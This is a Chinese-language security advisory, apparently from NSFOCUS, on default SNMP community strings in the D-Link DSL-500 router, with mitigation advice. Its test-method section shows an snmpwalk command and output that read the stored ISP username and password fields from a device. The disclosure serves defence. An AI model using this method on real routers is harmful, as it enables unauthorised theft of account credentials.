首页 -> 安全研究

安全研究

安全漏洞
D-Link DSL宽带Modem/路由器SNMP公共字符串漏洞

发布日期:2003-03-27
更新日期:2003-03-31

受影响系统:
D-Link DSL-500
描述:
D-Link DSL-500是一款DSL宽带路由器。

D-Link DSL-500存在默认公共SNMP共同体串,远程攻击者可以利用这个SNMP共同体串获得设备中包含的敏感信息,如用户名和密码。

默认安装的D-Link DSL-500开启了SNMP服务程序,其中包含默认的共同体字符串public和private,可以对设备进行读和修改操作。

另外ISP帐户信息如登录名和密码以明文方式存储在设备中,攻击者可以利用这个漏洞获得密码信息。

<*来源:Arhont Information Security (infosec@arhont.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104878180520626&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Arhont Information Security (infosec@arhont.com)提供了如下测试方法:

andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
Copyright (c) 2000 Dlink Corp.
sysObjectID.0 = OID: enterprises.171.10.30.1
sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
...

andrei@whale:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
...
...
...
transmission.23.2.3.1.5.2.1 = STRING:
"username@dsl-provider"
...
...
transmission.23.2.3.1.6.2.1 = STRING: "password-string"
...
...

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用访问控制限制不可信主机访问设备的UDP 161端口。

厂商补丁:

D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dlink.com/

浏览次数:3111
严重程度:1(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障